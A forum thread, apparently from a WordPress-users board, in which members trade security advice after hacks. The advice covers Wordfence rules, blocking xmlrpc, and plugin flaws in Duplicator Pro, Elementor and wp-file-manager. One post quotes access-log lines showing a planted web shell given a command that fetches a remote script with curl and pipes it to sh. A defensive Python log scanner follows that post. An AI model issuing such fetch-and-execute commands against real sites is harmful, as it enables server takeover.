Please Help!! I lost hope in WordPress!

MrSam_1

in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.
 

KarmaticOne

I don't even know the Duplicator Pro was used for this (hacking) but yes, I'm using Wordfence, Loginizer, 2-step login, VirusTotal, Google reCAPTCHA and I change my admin URL, daily backups, lock anyone who tries to use "admin" word and variations and so on.

Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
 

GodDevil

I don't even know the Duplicator Pro was used for this (hacking) but yes, I'm using Wordfence, Loginizer, 2-step login, VirusTotal, Google reCAPTCHA and I change my admin URL, daily backups, lock anyone who tries to use "admin" word and variations and so on.
Duplicator pro is vulnerable to hacking? OMG...many people suggest this plugin. However, I use Updraftplus. Hope Updraftplus is better.
 

themadoxter

Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
You're so polite, Babiato needs a "MVM" member badge. (most valuable member)
 

MrSam_1

What do you all think about file manager plugin in wordpress? Which let us edit any file from wordpress rather than accessing cpanel and editing it.

Let me answer this in a less common way:

Code:
[19/Dec/2020:08:57:08 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 1453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
[19/Dec/2020:08:57:48 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1" 200 411

I personally don't trust that plugin, as it had critical flaws in the last major releases.
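The request pair in the log excerpt above can be turned into a simple access-log check. This is an added example, not part of the original post: the sample lines are constructed in the same shape as the excerpt (the query value is a placeholder), and treating any PHP file under the plugin's `lib/files/` directory as suspicious is an assumption drawn from the paths shown.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines, shaped like the excerpt in the post.
SAMPLE_LOG = """\
[19/Dec/2020:08:55:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2210
[19/Dec/2020:08:57:08 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 1453
[19/Dec/2020:08:57:48 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=REDACTED HTTP/1.1" 200 411
[19/Dec/2020:09:02:13 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/logo.png HTTP/1.1" 200 5120
[19/Dec/2020:09:05:40 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 403 199
"""

# Timestamp, request line and status; works with or without a leading client IP.
LINE_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
PLUGIN = "/wp-content/plugins/wp-file-manager/"

def classify(line):
    """Return (label, timestamp, path) for a suspicious request, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = url.path.lower()
    if not path.startswith(PLUGIN):
        return None
    served = m["status"].startswith("2")  # 2xx means the server handled it
    if m["method"] == "POST" and path.endswith("/lib/php/connector.minimal.php"):
        label = "connector-post"
    elif path.startswith(PLUGIN + "lib/files/") and path.endswith(".php"):
        # Assumption: no PHP file should be served from this directory.
        label = "php-in-files-dir" + ("+query" if url.query else "")
    else:
        return None
    return (label if served else label + "-blocked", m["ts"], url.path)

def scan(text):
    """Classify every line of an access log and keep only the findings."""
    return [hit for hit in map(classify, text.splitlines()) if hit]

if __name__ == "__main__":
    for label, ts, path in scan(SAMPLE_LOG):
        print(f"{ts}  {label:26} {path}")
```

A served `connector-post` followed shortly by a served `php-in-files-dir` hit is the sequence worth escalating; the `-blocked` variants show probing that the server refused.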
 

KarmaticOne

in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.

This is sooo important it should almost be pinned. I completely block xmlrpc. Thank you for pointing out this simple yet crucial step.
 

🅰🅳🅸🆃🆈🅰

Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
Changing the wp-admin URL is more likely to be hacked, says Wordfence.
 

imraxstar

Yes, there is news from Wordfence recently which says the Elementor free version has some problem and it affected 7M websites worldwide; maybe this is what you are facing. Check the Wordfence blog for this and immediately either remove Elementor or update it. Elementor may be causing this issue. Check it.
 

frizzel

Yes, there is news from Wordfence recently which says the Elementor free version has some problem and it affected 7M websites worldwide; maybe this is what you are facing. Check the Wordfence blog for this and immediately either remove Elementor or update it. Elementor may be causing this issue. Check it.
Since he says all of his websites are affected, I doubt it's Elementor, cause the vulnerability only exists when people have access to the editor. From the Wordfence blog (comments section):

"this can only be exploited by users that can access the Elementor editor. If the only users on the site are those that are already allowed to add unfiltered HTML or JavaScript, such as administrators or editors, then yes, this doesn't add any additional risk. The primary risk is for sites that have users with fewer privileges, such as contributors and authors, as this creates a larger attack surface."

Still, given the huge user base of Elementor, it's a big thing...
 

underwater

in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.
Hi @slvrsteele, could you please explain the real steps to do what you suggest in simple language? I feel that your tip is important but I do not understand how to really apply it. Thank you in advance.
 

Eddie147

Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
That's true
 
